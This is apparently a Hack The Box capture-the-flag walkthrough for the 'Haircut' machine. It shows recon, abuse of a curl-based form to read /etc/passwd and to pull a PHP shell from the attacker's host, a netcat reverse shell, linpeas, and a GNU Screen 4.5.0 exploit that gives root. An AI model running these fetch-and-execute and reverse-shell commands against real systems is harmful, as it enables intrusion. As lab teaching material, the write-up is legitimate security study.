Haircut
Introduction:
Haircut is a very simple but great machine with a vulnerable app running that allows you to exploit curl to download a shell on the webserver and get the initial foothold.
Recon
NMAP scan
1nmap -sS -sV -sC -T4 -Pn -O -oN nmap.haircut.txt 10.10.10.24
2Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
3Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-04 20:39 EST
4Nmap scan report for haircut.htb (10.10.10.24)
5Host is up (0.014s latency).
6Not shown: 998 closed ports
7PORT STATE SERVICE VERSION
822/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
9| ssh-hostkey:
10| 2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
11| 256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
12|_ 256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
1380/tcp open http nginx 1.10.0 (Ubuntu)
14|_http-server-header: nginx/1.10.0 (Ubuntu)
15|_http-title: HTB Hairdresser
16No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
17TCP/IP fingerprint:
18OS:SCAN(V=7.91%E=4%D=1/4%OT=22%CT=1%CU=39875%PV=Y%DS=2%DC=I%G=Y%TM=5FF3C362
19OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=110%TI=Z%CI=I%II=I%TS=8)OPS(
20OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
21OS:NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
22OS:R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
23OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
24OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
25OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
26OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
27OS:S)
28
29Network Distance: 2 hops
30Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
31
32OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
33Nmap done: 1 IP address (1 host up) scanned in 21.12 seconds
34
35
Scan all ports
1Enter your target IP address or URL here: 10.10.10.24
2------------------------------------------------------------
3Scanning target 10.10.10.24
4Time started: 2021-01-04 20:39:22.511833
5------------------------------------------------------------
6Port 80 is open
7Port 22 is open
8Port scan completed in 0:00:06.438605
9
Enumeration
Lets do the directory enumeration for the webserver-
1
2gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.24
3===============================================================
4Gobuster v3.0.1
5by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
6===============================================================
7[+] Url: http://10.10.10.24
8[+] Threads: 10
9[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
10[+] Status codes: 200,204,301,302,307,401,403
11[+] User Agent: gobuster/3.0.1
12[+] Timeout: 10s
13===============================================================
142021/01/04 20:41:52 Starting gobuster
15===============================================================
16/uploads (Status: 301)
17===============================================================
182021/01/04 20:47:20 Finished
19===============================================================
20root@kinetic:.../hackthebox/haircut/data#
21
22
uploads seems to be a juicy target! Lets check if we can scan for additional file extensions. This time I fired up dirbuster as I really like the tree view for recursive searches.
There you have it .. we have a php page!
Exploitation
Lets have some fun with this form -
file:///127.0.0.1/../../../etc/passwd
file:///127.0.0.1/../../../var/www/html/test.html
Now, lets see if we can download a shell and access it -
http://10.10.14.38:8000/shell.php>/var/www/html/shell.php » THIS did not work as I dont have perms looks like. Or may be it was uploaded to a different directory.
http://10.10.14.38:8000/shell.php>/var/www/html/uploads/shell.php » THIS WORKED!!!!!!
root@kinetic:…/hackthebox/haircut/data# nc -lvnp 4455 listening on [any] 4455 …
1connect to [10.10.14.38] from (UNKNOWN) [10.10.10.24] 53492
2Linux haircut 4.4.0-78-generic #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
3 04:01:49 up 1:22, 0 users, load average: 0.00, 0.00, 0.00
4USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
5uid=33(www-data) gid=33(www-data) groups=33(www-data)
6/bin/sh: 0: can't access tty; job control turned off
7$ $ $ $ $
8$ which python
9$ ls -l /usr/bin/ | grep python
10lrwxrwxrwx 1 root root 26 May 15 2017 dh_pypy -> ../share/dh-python/dh_pypy
11lrwxrwxrwx 1 root root 29 May 15 2017 dh_python3 -> ../share/dh-python/dh_python3
12lrwxrwxrwx 1 root root 23 May 15 2017 pdb3.5 -> ../lib/python3.5/pdb.py
13lrwxrwxrwx 1 root root 31 May 15 2017 py3versions -> ../share/python3/py3versions.py
14lrwxrwxrwx 1 root root 26 May 15 2017 pybuild -> ../share/dh-python/pybuild
15lrwxrwxrwx 1 root root 9 May 15 2017 python3 -> python3.5
16-rwxr-xr-x 2 root root 4460336 Nov 17 2016 python3.5
17-rwxr-xr-x 2 root root 4460336 Nov 17 2016 python3.5m
18lrwxrwxrwx 1 root root 10 May 15 2017 python3m -> python3.5m
19$ /usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash");'
20www-data@haircut:/$
Post-exploit/PrivEsc
Download Linpeas and run.
1www-data@haircut:/tmp$ wget http://10.10.14.38:8000/linpeas.sh
2wget http://10.10.14.38:8000/linpeas.sh
3--2021-01-05 04:04:06-- http://10.10.14.38:8000/linpeas.sh
4Connecting to 10.10.14.38:8000... connected.
5HTTP request sent, awaiting response... 200 OK
6Length: 313316 (306K) [text/x-sh]
7Saving to: 'linpeas.sh'
8
9linpeas.sh 100%[===================>] 305.97K --.-KB/s in 0.08s
10
112021-01-05 04:04:06 (3.88 MB/s) - 'linpeas.sh' saved [313316/313316]
12
13www-data@haircut:/tmp$ chmod 755 linpeas.sh
14chmod 755 linpeas.sh
15www-data@haircut:/tmp$ ./linpeas.sh
LINPEAS
1====================================( Basic information )=====================================
2OS: Linux version 4.4.0-78-generic (buildd@lgw01-11) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017
3User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
4Hostname: haircut
5Writable folder: /dev/shm
6[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
7[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
8
9
10[+] All users & groups
11uid=0(root) gid=0(root) groups=0(root)
12uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
13uid=10(uucp) gid=10(uucp) groups=10(uucp)
14uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
15uid=1000(maria) gid=1000(maria) groups=1000(maria),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
16
17
18-rwsr-xr-x 1 root root 1.6M May 19 2017 /usr/bin/screen-4.5.0
19 --- It looks like /usr/bin/screen-4.5.0 is executing from and you can impersonate it (strings line: from wiH)
20 --- It looks like /usr/bin/screen-4.5.0 is executing /dev and you can impersonate it (strings line: /dev)
21 --- It looks like /usr/bin/screen-4.5.0 is executing /dev/ and you can impersonate it (strings line: /dev/)
22 --- It looks like /usr/bin/screen-4.5.0 is executing /dev/console and you can impersonate it (strings line: /dev/console)
23 --- It looks like /usr/bin/screen-4.5.0 is executing /dev/null and you can impersonate it (strings line: /dev/null)
24 --- It looks like /usr/bin/screen-4.5.0 is executing /dev/ptmx and you can impersonate it (strings line: /dev/ptmx)
25 --- It looks like /usr/bin/screen-4.5.0 is executing /dev/tty and you can impersonate it (strings line: /dev/tty)
26 --- It looks like /usr/bin/screen-4.5.0 is executing /tmp/screens and you can impersonate it (strings line: /tmp/screens)
27 --- It looks like /usr/bin/screen-4.5.0 is executing /usr/include and you can impersonate it (strings line: /usr/include)
28 --- It looks like /usr/bin/screen-4.5.0 is executing /usr/include/netinet and you can impersonate it (strings line: /usr/include/netinet)
29 --- It looks like /usr/bin/screen-4.5.0 is executing /usr/include/x86_64-linux-gnu/bits and you can impersonate it (strings line: /usr/include/x86_64-linux-gnu/bits)
30 --- It looks like /usr/bin/screen-4.5.0 is executing /usr/include/x86_64-linux-gnu/sys and you can impersonate it (strings line: /usr/include/x86_64-linux-gnu/sys)
31 --- It looks like /usr/bin/screen-4.5.0 is executing /usr/lib/gcc/x86_64-linux-gnu/5/include and you can impersonate it (strings line: /usr/lib/gcc/x86_64-linux-gnu/5/include)
32 --- It looks like /usr/bin/screen-4.5.0 is executing /usr/local/bin/screen and you can impersonate it (strings line: /usr/local/bin/screen)
33 --- It looks like /usr/bin/screen-4.5.0 is executing /usr/share/screen/utf8encodings and you can impersonate it (strings line: /usr/share/screen/utf8encodings)
34 --- It looks like /usr/bin/screen-4.5.0 is executing chacl and you can impersonate it (strings line: chacl)
35 --- It looks like /usr/bin/screen-4.5.0 is executing chmod and you can impersonate it (strings line: chmod)
36
37
38[+] SGID
39[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
40-rwxr-sr-x 1 root mlocate 39K Nov 18 2014 /usr/bin/mlocate
41-rwsr-sr-x 1 daemon daemon 51K Jan 14 2016 /usr/bin/at
42-rwxr-sr-x 1 root utmp 425K Feb 7 2016 /usr/bin/screen.old
43 --- It looks like /usr/bin/screen.old is executing from and you can impersonate it (strings line: from wiH)
44 --- It looks like /usr/bin/screen.old is executing /dev/ and you can impersonate it (strings line: /dev/)
45 --- It looks like /usr/bin/screen.old is executing /dev/console and you can impersonate it (strings line: /dev/console)
46 --- It looks like /usr/bin/screen.old is executing /dev/null and you can impersonate it (strings line: /dev/null)
47 --- It looks like /usr/bin/screen.old is executing /dev/tty and you can impersonate it (strings line: /dev/tty)
48 --- It looks like /usr/bin/screen.old is executing /usr/share/screen/utf8encodings and you can impersonate it (strings line: /usr/share/screen/utf8encodings)
49 --- It looks like /usr/bin/screen.old is executing /var/run/screen and you can impersonate it (strings line: /var/run/screen)
50 --- It looks like /usr/bin/screen.old is executing chacl and you can impersonate it (strings line: chacl)
51 --- It looks like /usr/bin/screen.old is executing chmod and you can impersonate it (strings line: chmod)
52 --- It looks like /usr/bin/screen.old is executing chmod and you can impersonate it (strings line: chmod )
53 --- It looks like /usr/bin/screen.old is executing chmod and you can impersonate it (strings line: chmod tty)
54 --- It looks like /usr/bin/screen.old is executing chown and you can impersonate it (strings line: chown)
55 --- It looks like /usr/bin/screen.old is executing chown and you can impersonate it (strings line: chown tty)
56 --- It looks like /usr/bin/screen.old is executing clear and you can impersonate it (strings line: clear)
57 --- It looks like /usr/bin/screen.old is executing mkdir and you can impersonate it (strings line: mkdir)
58 --- It looks like /usr/bin/screen.old is executing mkfifo and you can impersonate it (strings line: mkfifo)
59 --- It looks like /usr/bin/screen.old is executing mkfifo and you can impersonate it (strings line: mkfifo failed)
60 --- It looks like /usr/bin/screen.old is executing realpath and you can impersonate it (strings line: realpath)
61 --- It looks like /usr/bin/screen.old is executing rename and you can impersonate it (strings line: rename)
62 --- It looks like /usr/bin/screen.old is executing reset and you can impersonate it (strings line: reset)
63 --- It looks like /usr/bin/screen.old is executing screen and you can impersonate it (strings line: screen )
64 --- It looks like /usr/bin/screen.old is executing setsid and you can impersonate it (strings line: setsid)
65 --- It looks like /usr/bin/screen.old is executing sleep and you can impersonate it (strings line: sleep)
66 --- It looks like /usr/bin/screen.old is executing sort and you can impersonate it (strings line: sort)
67 --- It looks like /usr/bin/screen.old is executing stat and you can impersonate it (strings line: stat )
68 --- It looks like /usr/bin/screen.old is executing unlink and you can impersonate it (strings line: unlink)
69 --- It looks like /usr/bin/screen.old is executing wall and you can impersonate it (strings line: wall)
70 --- Trying to execute /usr/bin/screen.old with strace in order to look for hijackable libraries...
71
72
73
74[+] Searching root files in home dirs (limit 30)
75/home/
76/home/maria/Desktop/user.txt
77/root/
So, we have screen running as root user, lets see if we can exploit that -
1(py3) eneloop@kinetic:.../hackthebox/haircut/data$ searchsploit screen 4.5
2----------------------------------------------------------------------------------- ---------------------------------
3 Exploit Title | Path
4----------------------------------------------------------------------------------- ---------------------------------
5GNU Screen 4.5.0 - Local Privilege Escalation | linux/local/41154.sh
6GNU Screen 4.5.0 - Local Privilege Escalation (PoC) | linux/local/41152.txt
7----------------------------------------------------------------------------------- ---------------------------------
8Shellcodes: No Results
9(py3) eneloop@kinetic:.../hackthebox/haircut/data$
Yay! Juicy.
Copy the file over, looks like it has ^M characters, lets run dos2unix command to clean it up before we transport it over to the destination -
1
2(py3) eneloop@kinetic:.../hackthebox/haircut/data$ dos2unix 41154.sh
3dos2unix: converting file 41154.sh to Unix format...
4(py3) eneloop@kinetic:.../hackthebox/haircut/data$ vi 41154.sh
5(py3) eneloop@kinetic:.../hackthebox/haircut/data$ python -m http.server
6Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
710.10.10.24 - - [04/Jan/2021 22:13:32] "GET /41154.sh HTTP/1.1" 200 -
8
9www-data@haircut:/tmp$ chmod 755 41154.sh
10chmod 755 41154.sh
11www-data@haircut:/tmp$ ./41154.sh
12./41154.sh
13bash: ./41154.sh: /bin/bash^M: bad interpreter: No such file or directory
14www-data@haircut:/tmp$ dos2unix
15dos2unix
16The program 'dos2unix' is currently not installed. To run 'dos2unix' please ask your administrator to install the package 'dos2unix'
17www-data@haircut:/tmp$ wget http://10.10.14.38:8000/41154.sh
18wget http://10.10.14.38:8000/41154.sh
19--2021-01-05 04:21:44-- http://10.10.14.38:8000/41154.sh
20Connecting to 10.10.14.38:8000... connected.
21HTTP request sent, awaiting response... 200 OK
22Length: 1151 (1.1K) [text/x-sh]
23Saving to: '41154.sh.1'
24
2541154.sh.1 100%[===================>] 1.12K --.-KB/s in 0.004s
26
272021-01-05 04:21:44 (272 KB/s) - '41154.sh.1' saved [1151/1151]
28
29www-data@haircut:/tmp$ ls -otr
30ls -otr
31total 384
32-rwxr-xr-x 1 www-data 313316 Jan 4 01:25 linpeas.sh
33drwx------ 3 root 4096 Jan 5 02:38 systemd-private-445a0ec61391415db8e3691ba4ef2858-systemd-timesyncd.service-TBudxB
34drwx------ 2 root 4096 Jan 5 02:39 vmware-root
35-rw-r--r-- 1 www-data 540 Jan 5 03:31 test.txt
36-rw-r--r-- 1 www-data 3777 Jan 5 03:52 shell.php
37-rw-rw-rw- 1 www-data 16554 Jan 5 03:58 41458.c
38drwxr-xr-x 3 root 4096 Jan 5 04:05 screens
39drwx------ 2 www-data 4096 Jan 5 04:05 tmux-33
40-rwxr-xr-x 1 www-data 1192 Jan 5 04:11 41154.sh
41-rw-rw-rw- 1 www-data 1151 Jan 5 04:13 41154.sh.1
42-rwxrwxrwx 1 www-data 24024 Jan 5 04:15 pwn
43www-data@haircut:/tmp$ rm 41154.sh; mv 41154.sh.1 41154.sh
44rm 41154.sh; mv 41154.sh.1 41154.sh
45www-data@haircut:/tmp$ chmod 755 41154.sh
46chmod 755 41154.sh
Now, just run the exploit and get the privesc for an easy win!
1www-data@haircut:/tmp$ ./41154.sh
2./41154.sh
3~ gnu/screenroot ~
4[+] First, we create our shell and library...
5/tmp/libhax.c: In function 'dropshell':
6/tmp/libhax.c:7:5: warning: implicit declaration of function 'chmod' [-Wimplicit-function-declaration]
7 chmod("/tmp/rootshell", 04755);
8 ^
9/tmp/rootshell.c: In function 'main':
10/tmp/rootshell.c:3:5: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]
11 setuid(0);
12 ^
13/tmp/rootshell.c:4:5: warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]
14 setgid(0);
15 ^
16/tmp/rootshell.c:5:5: warning: implicit declaration of function 'seteuid' [-Wimplicit-function-declaration]
17 seteuid(0);
18 ^
19/tmp/rootshell.c:6:5: warning: implicit declaration of function 'setegid' [-Wimplicit-function-declaration]
20 setegid(0);
21 ^
22/tmp/rootshell.c:7:5: warning: implicit declaration of function 'execvp' [-Wimplicit-function-declaration]
23 execvp("/bin/sh", NULL, NULL);
24 ^
25[+] Now we create our /etc/ld.so.preload file...
26[+] Triggering...
27' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
28[+] done!
29No Sockets found in /tmp/screens/S-www-data.
30
31# whoami
32whoami
33root
34# cd /root
35cd /root
36# ls
37ls
38root.txt
39# cat root.txt
40cat root.txt
414cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX51
42#